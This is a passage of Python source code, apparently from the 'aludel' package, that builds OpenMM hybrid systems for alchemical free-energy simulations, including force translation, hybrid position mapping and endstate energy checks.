unique_new_atoms\n to_hybrid_map = old_to_hybrid_map if force == old_force else new_to_hybrid_map\n for idx in range(num_terms):\n all_params = query_term_by_idx_fn(idx) # full param spec\n orig_indices = all_params[:num_particles] # get the original indices\n hybr_indices = [to_hybrid_map[_q] for _q in orig_indices] # map to hybrid indices\n unitless_term_params = maybe_params_as_unitless(all_params[num_particles:]) # make the terms unitless\n hybr_ind_str = '.'.join([str(_q) for _q in hybr_indices]) # make hybrid indices strings\n # check if contains uniques first\n if len(set(orig_indices).intersection(uniques)) > 0:\n # unique new/old particles included\n _del = unique_old_del if force == old_force else unique_new_del\n _term_idx = term_adder_fn(*hybr_indices,\n unitless_term_params + _del)\n else: # no unique particles in this.\n if force == old_force: # iterate over this first,\n # make it old; adjust this afterward if it is\n # encountered in `force == new_force`\n _term_idx = term_adder_fn(*hybr_indices, unitless_term_params + old_del)\n try: # try to append it to the recorder dict\n hybr_idx_to_term_dict[hybr_ind_str].append(_term_idx)\n except Exception as e: # if it is not in the keys, make a new one\n hybr_idx_to_term_dict[hybr_ind_str] = [_term_idx]\n else: # force == new_force\n rev_hybr_ind_str = '.'.join([str(_q) for _q in hybr_indices[::-1]])\n try: # try to query the recorder dict\n try: # query as the str exists\n match_term_indices = hybr_idx_to_term_dict[hybr_ind_str]\n except: # query backward str\n match_term_indices = hybr_idx_to_term_dict[rev_hybr_ind_str]\n except Exception as e: # there are no match terms\n match_term_indices = []\n if len(match_term_indices) == 0:\n # this is a mapped term that is new\n _term_idx = term_adder_fn(*hybr_indices,\n unitless_term_params + new_del)\n else: # there is at least 1 idx match; now match parameters\n param_match = False\n for match_term_idx in match_term_indices: # iterate over matches\n match_params = query_U_out_by_idx_fn(match_term_idx)\n non_delimiter_match_params = match_params[-1][:-5]\n if np.allclose(list(unitless_term_params), list(non_delimiter_match_params)):\n # these terms match, and we can make them static...\n param_match = True\n break\n if param_match: # there is a term with _exact_ parameters\n term_setter_fn(match_term_idx, *hybr_indices, list(non_delimiter_match_params) + static_del)\n else: # there is no term with _exact_ parametes; add to new\n _ = term_adder_fn(*hybr_indices, unitless_term_params + new_del)\n return U_out\n\ndef translate_standard_nonbonded_force(\n old_nbf: openmm.NonbondedForce,\n new_nbf: openmm.NonbondedForce,\n num_hybrid_particles: int,\n old_to_hybrid_map: Dict[int, int],\n new_to_hybrid_map: Dict[int, int],\n unique_old_atoms: Iterable[int],\n unique_new_atoms: Iterable[int],\n unique_old_exception_switch: str,\n unique_new_exception_switch: str,\n exception_offset: str,\n particle_offset: str,\n **kwargs) -> Tuple[openmm.NonbondedForce, openmm.NonbondedForce]:\n\n # make U_static and add global parameters\n U_static = copy.deepcopy(old_nbf)\n for gp in [unique_old_exception_switch, unique_new_exception_switch]:\n U_static.addGlobalParameter(gp, 1.)\n for gp in [exception_offset, particle_offset]:\n U_static.addGlobalParameter(gp, 0.)\n num_old_particles = old_nbf.getNumParticles()\n num_new_particles = new_nbf.getNumParticles()\n assert all([key==val for key, val in old_to_hybrid_map.items()]), \\\n f\"\"\"nbf translation requirement for consistency\"\"\"\n assert 
num_old_particles == len(old_to_hybrid_map)\n\n hybrid_to_old_map = {val:key for key, val in old_to_hybrid_map.items()}\n hybrid_to_new_map = {val:key for key, val in new_to_hybrid_map.items()}\n\n # add extra particles\n particle_difference = num_hybrid_particles - num_old_particles\n [U_static.addParticle(0.,0.,0.) for _ in range(particle_difference)]\n\n # first thing to do is gather all of the nonbonded exceptions\n exception_data = {}\n for orig_force in [old_nbf, new_nbf]:\n exception_data[orig_force] = {}\n num_exceptions = orig_force.getNumExceptions()\n to_hybrid_map = old_to_hybrid_map if orig_force == old_nbf \\\n else new_to_hybrid_map\n for orig_exception_idx in range(num_exceptions):\n _params = orig_force.getExceptionParameters(orig_exception_idx)\n orig_indices = _params[:2]\n hybrid_indices = [to_hybrid_map[_q] for _q in orig_indices]\n sorted_hybrid_inds_str = sort_indices_to_str(hybrid_indices)\n exception_data[orig_force][sorted_hybrid_inds_str] = orig_exception_idx\n\n # now, iterate through the exceptions\n for _force in [old_nbf, new_nbf]:\n num_exceptions = _force.getNumExceptions()\n opp_force = old_nbf if _force == new_nbf else new_nbf\n to_hybrid_map = old_to_hybrid_map if _force == old_nbf \\\n else new_to_hybrid_map\n to_opposite_orig_map = hybrid_to_new_map if _force == old_nbf \\\n else hybrid_to_old_map\n opp_exc_dict_to_query = exception_data[new_nbf] if \\\n _force == old_nbf else exception_data[old_nbf]\n uniques = unique_old_atoms if _force == old_nbf \\\n else unique_new_atoms\n unique_param_offset_gp = unique_old_exception_switch \\\n if _force == old_nbf else unique_new_exception_switch\n for orig_exc_idx in range(num_exceptions):\n orig_exc_params = _force.getExceptionParameters(orig_exc_idx)\n orig_indices = orig_exc_params[:2]\n orig_nonidx_params = maybe_params_as_unitless(orig_exc_params[2:])\n hybrid_inds = [to_hybrid_map[_q] for _q in orig_indices]\n sorted_hybrid_inds_str = sort_indices_to_str(hybrid_inds)\n contains_unique = len(\n set(orig_indices).intersection(set(uniques))) > 0\n try: # get the exception from the opposite system\n opp_exc_idx = opp_exc_dict_to_query[sorted_hybrid_inds_str]\n except Exception as e: # the exception idx doesn't exist;\n opp_exc_idx = -1\n if opp_exc_idx == -1:\n # that means the particles included are unique or the\n # exception is simply not in the opposing system\n if contains_unique:\n # zero the params and make an offset for unique news\n new_exc_idx = U_static.addException(*hybrid_inds,\n 0., 0., 0., replace=True)\n new_exc_offset_idx = U_static.addExceptionParameterOffset(\n unique_param_offset_gp, new_exc_idx, *orig_nonidx_params)\n else:\n raise Exception(f\"\"\"this is not well-tested;\n reconsider your mapping, please.\"\"\")\n # the opposite params must be queried from particle params\n opp_particle_indices = [to_opposite_orig_map[_q] for\n _q in hybrid_inds]\n cp, s, e = make_exception_param_from_particles(opp_force,\n opp_particle_indices)\n _scales = [_new - _old for _old, _new in zip(orig_nonidx_params,\n [cp, s, e])]\n new_exc_offset_idx = U_static.addExceptionParameterOffset(\n exception_offset, orig_exc_idx, _scales)\n else: # this means that the exception _is_\n # mapped in the opposite system\n # only write the offset for the first iter in the for (old_nbf)\n # and if the the parameters are not the same (otherwise it would\n # be redundant.)\n opposite_parameters = maybe_params_as_unitless(\n opp_force.getExceptionParameters(opp_exc_idx)[2:])\n if _force == old_nbf and not np.allclose(\n 
orig_nonidx_params, opposite_parameters):\n opposite_parameters = maybe_params_as_unitless(\n opp_force.getExceptionParameters(opp_exc_idx)[2:])\n _scales = [_new - _old for _old, _new in zip(orig_nonidx_params,\n opposite_parameters)]\n new_exc_offset_idx = U_static.addExceptionParameterOffset(\n exception_offset, orig_exc_idx, *_scales)\n\n # then add exceptions between all unique new/old\n for unique_new_idx in unique_new_atoms:\n unique_new_hybr_idx = new_to_hybrid_map[unique_new_idx]\n for unique_old_idx in unique_old_atoms:\n unique_old_hybrid_idx = old_to_hybrid_map[unique_old_idx]\n _ = U_static.addException(unique_old_hybrid_idx,\n unique_new_hybr_idx, 0., 0., 0.)\n\n # exceptions are handled\n # iterate over particles...\n for old_idx, hybrid_idx in old_to_hybrid_map.items(): # redundant\n # this is redundant because of first assert statement\n old_params = old_nbf.getParticleParameters(old_idx)\n U_static.setParticleParameters(hybrid_idx, *old_params)\n if old_idx in unique_old_atoms: # create an offset\n _scales = [-1*_i for _i in maybe_params_as_unitless(old_params)]\n _ = U_static.addParticleParameterOffset(\n particle_offset, hybrid_idx, *_scales)\n try:\n new_particle_idx = hybrid_to_new_map[hybrid_idx]\n except:\n new_particle_idx = -1\n if new_particle_idx >=0: # it is mapped;\n # decide whether to add offset.\n new_params = new_nbf.getParticleParameters(new_particle_idx)\n _old_params = maybe_params_as_unitless(old_params)\n _new_params = maybe_params_as_unitless(new_params)\n _scales = [_new - _old for _old, _new in\n zip(_old_params, _new_params)]\n if not np.allclose(_old_params, _new_params):\n _ = U_static.addParticleParameterOffset(\n particle_offset, hybrid_idx, *_scales)\n else: # old params are same as new params for particle\n # we have already added the old params, so pass\n pass\n\n else:\n assert old_idx in unique_old_atoms\n\n for new_idx in unique_new_atoms:\n new_params = new_nbf.getParticleParameters(new_idx)\n hybrid_idx = new_to_hybrid_map[new_idx]\n _ = U_static.addParticleParameterOffset(\n particle_offset, hybrid_idx, *new_params)\n\n # now pull it all together\n U0_static = copy.deepcopy(U_static)\n U1_static = copy.deepcopy(U_static)\n\n for gp_idx in range(U0_static.getNumGlobalParameters()):\n gp_name = U0_static.getGlobalParameterName(gp_idx)\n gp_val = U0_static.getGlobalParameterDefaultValue(gp_idx)\n if np.isclose(gp_val, 0.): # then U1_static gets turned to 1\n U1_static.setGlobalParameterDefaultValue(gp_idx, 1.)\n U0_static.setGlobalParameterName(gp_idx, f\"U0_static_\" + gp_name)\n U1_static.setGlobalParameterName(gp_idx, f\"U1_static_\" + gp_name)\n return U0_static, U1_static\n\ndef get_hybrid_positions(old_positions: unit.Quantity,\n new_positions: unit.Quantity,\n num_hybrid_particles: int,\n old_to_hybrid_map: Dict[int, int],\n new_to_hybrid_map: Dict[int, int],\n **unused_kwargs) -> unit.Quantity:\n \"\"\"get hybrid positions from old/new positions; `openmm`-amenable;\n `mapped_positions_on_old` will write mapped positions to the old particle indices;\n otherwise, will map to new.\"\"\"\n hybrid_positions = np.zeros((num_hybrid_particles, 3))\n old_pos_sans_units = old_positions.value_in_unit_system(unit.md_unit_system)\n new_pos_sans_units = new_positions.value_in_unit_system(unit.md_unit_system)\n to_hybrid_maps = [old_to_hybrid_map, new_to_hybrid_map]\n from_position_cache = [old_pos_sans_units, new_pos_sans_units]\n\n for to_hybrid_map, from_positions in zip(to_hybrid_maps, from_position_cache):\n for orig_idx, hybrid_idx in 
to_hybrid_map.items():\n hybrid_positions[hybrid_idx,:] = from_positions[orig_idx,:]\n return hybrid_positions * unit.nanometers\n\ndef get_original_positions_from_hybrid(hybrid_positions: unit.Quantity,\n hybrid_to_original_map: Dict[int,int],\n **unused_kwargs):\n out_positions = np.zeros((len(hybrid_to_original_map), 3))\n hybrid_posits_sans_units = hybrid_positions/unit.nanometer\n for hybrid_idx, orig_idx in hybrid_to_original_map.items():\n out_positions[orig_idx,:] = hybrid_posits_sans_units[hybrid_idx, :]\n return out_positions*unit.nanometer\n\ndef energy_by_force(system: openmm.System,\n reference_positions: unit.Quantity,\n context_args: Tuple[Any],\n box_vectors: Tuple[unit.Quantity]=None,\n global_parameters: Dict[str, int]=None,\n forces_too: bool=False) -> Dict[str, unit.Quantity]:\n \"\"\"\n from a unique-force-style system with reference positions/box_vectors,\n iterate through each force object and return the potential energy per\n force object.\n \"\"\"\n for idx, force in enumerate(system.getForces()):\n force.setForceGroup(idx)\n\n context = openmm.Context(system, openmm.VerletIntegrator(1.), *context_args)\n if box_vectors is None:\n box_vectors = system.getDefaultPeriodicBoxVectors()\n context.setPeriodicBoxVectors(*box_vectors)\n context.setPositions(reference_positions)\n if global_parameters is not None:\n for _name, _val in global_parameters.items():\n context.setParameter(_name, _val)\n out_energies = {}\n out_forces = {}\n for idx, force in enumerate(system.getForces()):\n state = context.getState(getEnergy=True, getForces=True, groups={idx})\n _e = state.getPotentialEnergy().value_in_unit_system(unit.md_unit_system)\n _f = state.getForces(asNumpy=True).value_in_unit_system(unit.md_unit_system)\n out_energies[force] = _e\n out_forces[force] = _f\n del context\n if forces_too:\n return out_energies, out_forces\n else:\n return out_energies\n\n\ndef getParameters_to_dict(mapstringdouble):\n out_dict = {}\n for key in mapstringdouble:\n out_dict[key] = mapstringdouble[key]\n return out_dict\n\ndef setParameters(parameters, context):\n for key, val in parameters.items():\n context.setParameter(key,val)\n\n# class definition\n\nclass BaseSingleTopologyHybridSystemFactory(object):\n \"\"\"\n base class for generating a hybrid system object\n \"\"\"\n _allowed_force_names = ['HarmonicBondForce',\n 'HarmonicAngleForce', 'PeriodicTorsionForce',\n 'NonbondedForce', 'MonteCarloBarostat']\n\n def __init__(\n self: Any,\n old_system: openmm.System, # old_system\n new_system: openmm.System, # new system\n old_to_new_atom_map: Dict[int, int],\n unique_old_atoms: Iterable[int],\n unique_new_atoms: Iterable[int],\n **kwargs):\n\n self._old_system = copy.deepcopy(old_system)\n self._new_system = copy.deepcopy(new_system)\n self._old_to_new_atom_map = copy.deepcopy(old_to_new_atom_map)\n self._unique_old_atoms = copy.deepcopy(unique_old_atoms)\n self._unique_new_atoms = copy.deepcopy(unique_new_atoms)\n self._hybrid_system = openmm.System()\n\n # now call setup fns\n self._add_particles_to_hybrid(**kwargs)\n self._get_force_dicts(**kwargs) # render force dicts for new/old sys\n self._assert_allowable_forces(**kwargs)\n self._copy_box_vectors(**kwargs) # copy box vectors\n self._handle_constraints(**kwargs)\n self._handle_virtual_sites(**kwargs)\n\n self._equip_hybrid_forces(**kwargs)\n\n if self._hybrid_system.usesPeriodicBoundaryConditions():\n self._copy_barostat(**kwargs) # copy barostat\n\n def _add_particles_to_hybrid(self, **unused_kwargs):\n \"\"\"copy all old system 
particles to hybrid with identity mapping\"\"\"\n self._old_to_hybrid_map = {}\n self._new_to_hybrid_map = {}\n\n old_num_particles = self._old_system.getNumParticles()\n new_num_particles = self._new_system.getNumParticles()\n for idx in range(old_num_particles): # iterate over old particles\n mass_old = self._old_system.getParticleMass(idx)\n if idx in self._old_to_new_atom_map.keys():\n idx_in_new_sys = self._old_to_new_atom_map[idx]\n mass_new = self._new_system.getParticleMass(idx_in_new_sys)\n mix_mass = (mass_old + mass_new) / 2\n else:\n mix_mass = mass_old\n hybrid_idx = self._hybrid_system.addParticle(mix_mass)\n self._old_to_hybrid_map[idx] = hybrid_idx\n\n # make assertion on old particles map equivalence\n assert {key==val for key, val in self._old_to_hybrid_map.items()}, f\"\"\"\n old particle to hybrid particle map is not equivalent\"\"\"\n\n # make assertion on old particles\n assert len(self._old_to_hybrid_map) == old_num_particles, f\"\"\"\n there is a convention mistake; the `self._old_to_hybrid_map`\n has {len(self._old_to_hybrid_map)} particles, but the old\n system has {old_num_particles} particles\"\"\"\n\n # make the `hybrid_to_old_map`\n self._hybrid_to_old_map = {value: key for key, value in\n self._old_to_hybrid_map.items()}\n\n # make `self._hybrid_to_new_map`;\n # first, since all of the old indices are equiv to hybrid indices...\n self._hybrid_to_new_map = copy.deepcopy(self._old_to_new_atom_map)\n\n for idx in self._unique_new_atoms: # iterate over new particles\n mass = self._new_system.getParticleMass(idx)\n hybrid_idx = self._hybrid_system.addParticle(mass)\n self._hybrid_to_new_map[hybrid_idx] = idx\n\n # make assertion on new particles\n new_num_particles = self._new_system.getNumParticles()\n assert len(self._hybrid_to_new_map) == new_num_particles, f\"\"\"\n there is a convention mistake; the `self._new_to_hybrid_map`\n has {len(self._hybrid_to_new_map)} particles, but the new\n system has {new_num_particles} particles\"\"\"\n\n # make the `new_to_hybrid_map`\n self._new_to_hybrid_map = {value: key for key, value in\n self._hybrid_to_new_map.items()}\n\n def _get_force_dicts(self, **unused_kwargs):\n \"\"\"make a dict of force for each system and set attrs\"\"\"\n for key, sys in zip(['_old_forces', '_new_forces'],\n [self._old_system, self._new_system]):\n setattr(self,\n key,\n {force.__class__.__name__: force for force in sys.getForces()}\n )\n\n def _assert_allowable_forces(self, **unused_kwargs):\n \"\"\"this method ensures that the two systems are effectively identical\n at the `System` level; importantly, we assert that:\n 1. the number/name of forces in each system is identical\n 2. 
the force name in each system is in the 'allowed_forcenames'\n \"\"\"\n # make sure that each force in each system is allowed\n for force_dict in [self._old_forces, self._new_forces]:\n try:\n for force_name in force_dict.keys():\n assert force_name in self._allowed_force_names\n except Exception as e:\n raise NameError(f\"\"\"\n In querying force dict, assertion failed with {e}\n \"\"\")\n\n def _handle_constraints(self, **unused_kwargs):\n \"\"\"copy constraints; check to make sure it doesn't change\"\"\"\n constraint_lengths = {}\n for system_name in ['old', 'new']:\n sys = getattr(self, f\"_{system_name}_system\")\n hybrid_map = getattr(self, f\"_{system_name}_to_hybrid_map\")\n for constraint_idx in range(sys.getNumConstraints()):\n a1, a2, length = sys.getConstraintParameters(constraint_idx)\n hybr_atoms = tuple(sorted([hybrid_map[a1], hybrid_map[a2]]))\n if hybr_atoms not in constraint_lengths.keys():\n self._hybrid_system.addConstraint(*hybr_atoms, length)\n constraint_lengths[hybr_atoms] = length\n else:\n if constraint_lengths[hybr_atoms] != length:\n raise Exception(f\"\"\"\n Constraint length is changing for atoms {hybr_atoms}\n in hybrid system: old is\n {constraint_lengths[hybr_atoms]} and new is\n {length}\n \"\"\")\n\n def _copy_box_vectors(self, **unused_kwargs):\n box_vectors = self._old_system.getDefaultPeriodicBoxVectors()\n self._hybrid_system.setDefaultPeriodicBoxVectors(*box_vectors)\n\n def _copy_barostat(self, **unused_kwargs):\n if \"MonteCarloBarostat\" in self._old_forces.keys():\n barostat = copy.deepcopy(self._old_forces[\"MonteCarloBarostat\"])\n self._hybrid_system.addForce(barostat)\n\n def _handle_virtual_sites(self, **unused_kwargs):\n \"\"\"for now, assert that none of the particle are virtual sites\"\"\"\n for system_name in ['old', 'new']:\n sys = getattr(self, f\"_{system_name}_system\")\n num_ps = sys.getNumParticles()\n for idx in range(num_ps):\n if sys.isVirtualSite(idx):\n raise Exception(f\"\"\"\n system {system_name} particle {idx} is a virtual site\n but virtual sites are not currently supported.\n \"\"\")\n\n def _equip_hybrid_forces(self, **kwargs):\n pass\n\n @property\n def hybrid_system(self):\n return copy.deepcopy(self._hybrid_system)\n\nclass V1SingleTopologyHybridSystemFactory(\n BaseSingleTopologyHybridSystemFactory):\n ATM_EXPR_TEMPLATE = [\n 'U0 + (({atm_lambda2} - {atm_lambda1})/{atm_alpha}) * log_term + {atm_lambda2}*u_sc + {atm_w0};',\n 'log_term = c + log(exp(-c) + exp(exponand-c));',\n 'c = max(0, exponand);',\n 'exponand = -{atm_alpha}*(u_sc - {atm_u0});',\n 'u_sc = select(soften_bool, u_soft, u);',\n 'soften_bool = select(1-{atm_soften_switch}, 0, step(u - {atm_u_cut}));',\n 'u_soft = ({atm_u_max} - {atm_u_cut}) * f_sc + {atm_u_cut};',\n 'f_sc = (z_y^{atm_a} - 1)/(z_y^{atm_a} + 1);',\n 'z_y = 1 + 2*y_by_a + 2*(y_by_a^2);',\n 'y_by_a = y / {atm_a};',\n 'y = (u - {atm_u_cut}) / ({atm_u_max} - {atm_u_cut});',\n 'u = U1 - U0;',\n 'U1 = select({atm_leg}, U0_static, U1_static);',\n 'U0 = select({atm_leg}, U1_static, U0_static);']\n\n ATM_EXPR = ''.join(ATM_EXPR_TEMPLATE)\n ATM_COLLECTIVE_VARS = ['U0_static', 'U1_static']\n ATM_GLOBAL_PARAMS = {\n 'atm_time': 0.,\n 'atm_lambda1': 0.,\n 'atm_lambda2': 0.,\n 'atm_alpha': 0.1,\n 'atm_u_cut': 200., # check this again in comparison to `_u0`\n 'atm_u0': 100.,\n 'atm_u_max': 400.,\n 'atm_a': 0.0625,\n 'atm_w0': 0.,\n 'atm_soften_switch': 1., # bool to determine whether to allow for soft u_sc,\n 'atm_leg': 0.,\n }\n\n VALENCE_EXPR_TEMPLATE = [\n \"U0_static = old_term + static_term + 
unique_term;\",\n \"U1_static = new_term + static_term + unique_term;\",\n \"unique_term = unique_old_switch*unique_old_term + unique_new_switch*unique_new_term;\"\n \"old_term = select(1-old, 0., U_valence);\",\n \"new_term = select(1-new, 0., U_valence);\",\n \"unique_old_term = select(1-uold, 0., U_valence);\",\n \"unique_new_term = select(1-unew, 0., U_valence);\"\n \"static_term = select(1-static, 0., U_valence);\"]\n\n VALENCE_EXPR = ' '.join(VALENCE_EXPR_TEMPLATE)\n VALENCE_GLOBAL_PARAMETERS = {'unique_old_switch': 1,\n 'unique_new_switch': 1}\n VALENCE_FORCE_UTILS = {\n 'HarmonicBondForce': {\n 'addTerm': 'addBond',\n 'setTerm': 'setBondParameters',\n 'query_num_terms': 'getNumBonds',\n 'query_params': 'getBondParameters',\n 'custom_force': openmm.CustomBondForce,\n 'num_particles': 2,\n 'add_per_term_param': 'addPerBondParameter',\n 'num_params': 2,\n 'per_term_params': ['length', 'k', 'static', 'old', 'new', 'uold', 'unew'],\n 'U_valence': \"U_valence = 0.5*k*(r-length)^2;\"},\n 'HarmonicAngleForce': {\n 'addTerm': 'addAngle',\n 'setTerm': 'setAngleParameters',\n 'query_num_terms': 'getNumAngles',\n 'query_params': 'getAngleParameters',\n 'custom_force': openmm.CustomAngleForce,\n 'num_particles': 3,\n 'add_per_term_param': 'addPerAngleParameter',\n 'num_params': 2,\n 'per_term_params': ['angle', 'k', 'static', 'old', 'new', 'uold', 'unew'],\n \"U_valence\": \"U_valence = 0.5*k*(theta-angle)^2;\"},\n 'PeriodicTorsionForce': {\n 'addTerm': 'addTorsion',\n 'setTerm': 'setTorsionParameters',\n 'query_num_terms': 'getNumTorsions',\n 'query_params': 'getTorsionParameters',\n 'custom_force': openmm.CustomTorsionForce,\n 'num_particles': 4,\n 'add_per_term_param': 'addPerTorsionParameter',\n 'num_parameters': 3,\n 'per_term_params': ['periodicity', 'phase', 'k', 'static', 'old', 'new', 'uold', 'unew'],\n \"U_valence\": \"U_valence = k*(1 + cos(periodicity*theta - phase));\"}\n }\n\n NONBONDED_GLOBAL_PARAMETERS = {'unique_old_exception_switch': 1.,\n 'unique_new_exception_switch': 1.,\n 'exception_offset' : 0.,\n 'particle_offset': 0.}\n def __init__(self,\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _default_protocol(self, time, parameters) -> Dict[str, float]:\n \"\"\"from a set of parameters, given the time, update them accordingly;\n `time` runs from 0 to 1\"\"\"\n lambda1 = time if time < 0.5 else 1. 
- time\n lambda2 = lambda1\n leg = 0 if time < 0.5 else 1\n updater = {\n 'atm_time': time,\n 'atm_lambda1': lambda1,\n 'atm_lambda2': lambda2,\n 'atm_leg': leg,\n }\n parameters.update(updater)\n return parameters\n\n\n def _equip_hybrid_forces(self, **kwargs):\n \"\"\"\n equip the valence and nonbonded forces.\n \"\"\"\n # manage the global params/custom expr first\n atm_global_param_format = {key: key for key in self.ATM_GLOBAL_PARAMS.keys()}\n atm_base_expression = copy.deepcopy(self.ATM_EXPR).format(**atm_global_param_format)\n\n # get the set of union forcenames\n joint_forcenames = set(list(self._old_forces.keys()) + list(self._new_forces.keys()))\n\n valence_custom_expr = atm_base_expression + self.VALENCE_EXPR\n valence_forcenames = list(self.VALENCE_FORCE_UTILS.keys())\n valence_global_params = copy.deepcopy(self.ATM_GLOBAL_PARAMS)\n valence_global_params.update(self.VALENCE_GLOBAL_PARAMETERS)\n for forcename in joint_forcenames:\n # warning, this will fail if the valence force is not in both systems.\n if forcename in valence_forcenames: # if it is valence\n old_force = self._old_forces[forcename]\n new_force = self._new_forces[forcename]\n out_force = translate_standard_valence_force_to_custom(\n old_force = old_force,\n new_force = new_force,\n old_to_hybrid_map = self._old_to_hybrid_map,\n new_to_hybrid_map = self._new_to_hybrid_map,\n unique_old_atoms = self._unique_old_atoms,\n unique_new_atoms = self._unique_new_atoms,\n force_utils = self.VALENCE_FORCE_UTILS[forcename],\n custom_expression = valence_custom_expr,\n global_parameters = valence_global_params,\n static_del = [1, 0, 0, 0, 0],\n old_del = [0, 1, 0, 0, 0],\n new_del = [0, 0, 1, 0, 0],\n unique_old_del = [0, 0, 0, 1, 0],\n unique_new_del = [0, 0, 0, 0, 1], **kwargs)\n _ = self._hybrid_system.addForce(out_force)\n\n # now nonbonded\n if 'NonbondedForce' in joint_forcenames:\n nonbonded_global_param_names = {key: key for\n key in self.NONBONDED_GLOBAL_PARAMETERS.keys()}\n u0_nb, u1_nb = translate_standard_nonbonded_force(\n old_nbf=self._old_forces['NonbondedForce'],\n new_nbf=self._new_forces['NonbondedForce'],\n num_hybrid_particles = self._hybrid_system.getNumParticles(),\n old_to_hybrid_map = self._old_to_hybrid_map,\n new_to_hybrid_map = self._new_to_hybrid_map,\n unique_old_atoms = self._unique_old_atoms,\n unique_new_atoms = self._unique_new_atoms,\n **nonbonded_global_param_names)\n cv = openmm.CustomCVForce(atm_base_expression)\n for coll_var_name, coll_var in zip(self.ATM_COLLECTIVE_VARS, [u0_nb, u1_nb]):\n cv.addCollectiveVariable(coll_var_name, copy.deepcopy(coll_var))\n for param_name, param_value in self.ATM_GLOBAL_PARAMS.items():\n cv.addGlobalParameter(param_name, param_value)\n _ = self._hybrid_system.addForce(cv)\n\n def test_energy_endstates(self, old_positions, new_positions,\n atol=1e-1, rtol=1e-6, verbose=False,\n context_args = (), **unused_kwargs):\n hybrid_system = self.hybrid_system # get the hybrid system\n\n # make match querier dict.\n std_to_custom_forcename = {key: _dict['custom_force']('').__class__.__name__\n for key, _dict in self.VALENCE_FORCE_UTILS.items()}\n std_to_custom_forcename['NonbondedForce'] = 'CustomCVForce' # handle nonbonded\n std_to_custom_forcename['MonteCarloBarostat'] = 'MonteCarloBarostat'\n\n # get positions.\n hybrid_positions = get_hybrid_positions(old_positions=old_positions,\n new_positions = new_positions, num_hybrid_particles=hybrid_system.getNumParticles(),\n old_to_hybrid_map = self._old_to_hybrid_map, new_to_hybrid_map = self._new_to_hybrid_map)\n 
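# a minimal consistency sketch (kept as a comment; np and unit are already\n        # imported at the top of this module): because get_hybrid_positions writes\n        # the new-system coordinates after the old ones, mapping back through\n        # self._hybrid_to_new_map must reproduce the input new_positions, e.g.\n        #   assert np.allclose(\n        #       new_positions.value_in_unit_system(unit.md_unit_system),\n        #       get_original_positions_from_hybrid(hybrid_positions,\n        #           self._hybrid_to_new_map).value_in_unit_system(unit.md_unit_system))\n        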
old_positions = get_original_positions_from_hybrid(hybrid_positions = hybrid_positions,\n hybrid_to_original_map = self._hybrid_to_old_map)\n new_positions = get_original_positions_from_hybrid(hybrid_positions = hybrid_positions,\n hybrid_to_original_map = self._hybrid_to_new_map)\n\n # first, retrieve the old/new system forces by object\n if verbose: print(f\"computing old force energies.\")\n old_force_dict = energy_by_force(system = copy.deepcopy(self._old_system),\n reference_positions = old_positions, context_args = context_args)\n if verbose: print(f\"computing new force energies\")\n new_force_dict = energy_by_force(system = copy.deepcopy(self._new_system),\n reference_positions = new_positions, context_args = context_args)\n\n # now set the valence global parameters to match old\n zero_atm_global_params = {'atm_time': 0.,\n 'atm_leg': 0.,\n 'unique_old_switch': 1.,\n 'unique_new_switch': 0.,\n 'U0_static_unique_old_exception_switch': 1.,\n 'U0_static_unique_new_exception_switch': 0.,\n 'U1_static_unique_old_exception_switch': 1.,\n 'U1_static_unique_new_exception_switch': 0.}\n switch_lambda = lambda x: 1. if x==0. else 0.\n one_atm_global_params = {key: switch_lambda(val) for key, val in zero_atm_global_params.items()}\n if verbose: print(f\"computing old hybrid force energies...\")\n hybr_old_force_dict = energy_by_force(system = self.hybrid_system,\n reference_positions = hybrid_positions, global_parameters=zero_atm_global_params,\n context_args = context_args)\n if verbose: print(f\"computing new hybrid force energies...\")\n hybr_new_force_dict = energy_by_force(system = copy.deepcopy(self.hybrid_system),\n reference_positions = hybrid_positions, global_parameters=one_atm_global_params,\n context_args = context_args)\n\n original_joint_forcenames = set(list(self._old_forces.keys())).union(\n set(list(self._new_forces.keys())))\n\n for original_forcename in original_joint_forcenames:\n custom_forcename = std_to_custom_forcename[original_forcename]\n old_energy = old_force_dict[original_forcename]\n new_energy = new_force_dict[original_forcename]\n if original_forcename == 'MonteCarloBarostat':\n if verbose: print(f\"omitting `MonteCarloBarostat`\")\n else:\n hybrid_old_energy = hybr_old_force_dict[custom_forcename]\n hybrid_new_energy = hybr_new_force_dict[custom_forcename]\n for endstate, orig_e, hybr_e in zip(['old', 'new'],\n [old_energy, new_energy], [hybrid_old_energy, hybrid_new_energy]):\n if not np.isclose(orig_e, hybr_e, atol=atol, rtol=rtol):\n raise Exception(f\"\"\"for original force {original_forcename}\n (custom force {custom_forcename}) at {endstate} state,\n energies do not match: {orig_e} vs {hybr_e}, respectively.\n \"\"\")\n elif verbose:\n print(f\"\"\"original force {original_forcename} with energy {orig_e}\n at state {endstate} match. 
({orig_e} and {hybr_e}, respectively)\"\"\")\n else:\n pass\n\nclass SCRFSingleTopologyHybridSystemFactory(BaseSingleTopologyHybridSystemFactory):\n \"\"\"\n SoftCore ReactionField Single Topology HybridSystemFactory;\n WARNING: this operation can expect to take ~15s in complex phase.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _default_protocol(self, time, parameters, **unused_kwargs) -> Dict[str, float]:\n updater = {'lambda_global': time}\n parameters.update(updater)\n return parameters\n\n def _make_rf_systems(self, **kwargs):\n \"\"\"internal utility to make reaction-field systems\n for energy matching comparisons and reference\"\"\"\n from aludel.rf import ReactionFieldConverter\n self._old_rf_system = ReactionFieldConverter(self._old_system, **kwargs).rf_system\n self._new_rf_system = ReactionFieldConverter(self._new_system, **kwargs).rf_system\n\n def _get_valence_converter(self, **unused_kwargs):\n \"\"\"get the valence converter factory\"\"\"\n from aludel.valence import SingleTopologyHybridValenceConverter\n return SingleTopologyHybridValenceConverter\n\n def _get_nonbonded_converter(self, **unused_kwargs):\n from aludel.rf import SingleTopologyHybridNBFReactionFieldConverter\n return SingleTopologyHybridNBFReactionFieldConverter\n\n def _equip_hybrid_forces(self, **kwargs):\n \"\"\"\n equip the valence and nonbonded forces\n \"\"\"\n valence_converter = self._get_valence_converter(**kwargs)\n nonbonded_converter = self._get_nonbonded_converter(**kwargs)\n # get the set of union forcenames\n joint_forcenames = set(list(self._old_forces.keys()) + list(self._new_forces.keys()))\n valence_forcenames = [i for i in self._allowed_force_names if i not in ['NonbondedForce',\n 'MonteCarloBarostat']]\n for forcename in joint_forcenames:\n if forcename in valence_forcenames: # if it is valence\n # this will fail if the valence force is not in both systems\n old_force = self._old_forces[forcename]\n new_force = self._new_forces[forcename]\n valence_hbf_factory = valence_converter(\n 